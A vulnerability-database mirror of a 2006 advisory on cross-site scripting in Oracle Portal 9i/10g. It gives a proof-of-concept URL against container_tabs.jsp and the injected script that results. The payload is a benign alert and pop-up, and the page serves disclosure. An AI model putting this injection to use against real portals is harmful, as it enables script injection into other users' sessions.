Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:15472
HistoryDec 23, 2006 - 12:00 a.m.

Oracle Applications/Portal 9i/10g Cross Site Scripting

2006-12-2300:00:00
vulners.com
19
JSON

Description

There are plenty (hundreds) of Cross Site Scripting vulnerabilities in the
Oracle Portal. The following is one that you may found in any version:

http://<target>/webapp/jsp/container_tabs.jsp?tc=null%20=%20null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now&#39;,&#37;20&#39;null&#39;&#41;;//

The following code will be generated:

—SNIPPED—
<script language=javascript>
top.null =
null;alert('Hello!');window.open('http://www.oracle.com/?fix_security_bugs_now&#39;,
'null');//.render(window);
</script>
—SNIPPED—

Solution

There is no solution. As a workaround, enable mod_security if it's not.
Otherwise wait 6 months/1 year for a patch from Oracle Corp.

Dale rienda suelta a tu tiempo libre. Mil ideas para exprimir tu ocio con
MSN Entretenimiento. http://entretenimiento.msn.es/

JSON